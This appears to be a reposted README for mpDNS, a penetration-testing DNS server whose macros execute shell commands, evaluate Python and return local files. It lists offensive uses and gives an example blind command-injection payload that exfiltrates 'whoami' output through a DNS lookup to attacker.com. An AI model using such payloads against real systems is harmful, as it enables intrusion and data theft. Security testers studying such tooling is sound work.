mpDNS: Multi-Purpose DNS Server

mpDNS aka multi-purpose DNS Server

DNS Server with multiple useful features

  • Should work on Python 2 and 3
  • names.db -> holds all custom records (see examples)
  • Simple wildcards like *.example.com
  • Catch unicode dns requests
  • Custom actions aka macro:
    • {{shellexec::dig google.com +short}} -> Execute shell command and respond with result
    • {{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> Evaluate your python code
    • {{file::/etc/passwd}} -> Respond with localfile contents
    • {{resolve}} -> Forward DNS request to local system DNS
    • {{resolve::example.com}} -> Resolve example.com instead of original record
    • {{echo}} -> Response back with peer address
    • {{shellexec::echo %PEER% %QUERY%}} -> Use of variables
  • Supported query types: ACNAMETXT
  • Update names.db records without restart/reload with ./mpdns.py -e

Offensive and Defensive purposes:

  1. You need a light-weight simple dns-server solution for testing purposes (NOT PRODUCTION!)
  2. Test for various blind injection vulnerabilities in web applications (ex. /ping.php?ip=$(dig $(whoami).attacker.com))
  3. Easily infiltrate 65K of data in one TXT query
  4. DNS Rebinding
  5. Execute custom macro action on a specific query (useful in malware-analysis lab environments)
  6. And lots more. It is highly customizable.

Install

git clone https://github.com/nopernik/mpDNS

Use

./mpdns.py

  • Edit names.db with ./mpdns.py -e no restart required

Tutorial

Copyright (C) 2018 nopernik

Anastasis Vasileiadis

PC Technical || Penetration Tester || Ethical Hacker || Cyber Security Expert || Cyber Security Analyst || Information Security Researcher || Malware analyst || Malware Investigator || Reverse Engineering

SC ProDefence SRL - Cyber Security Services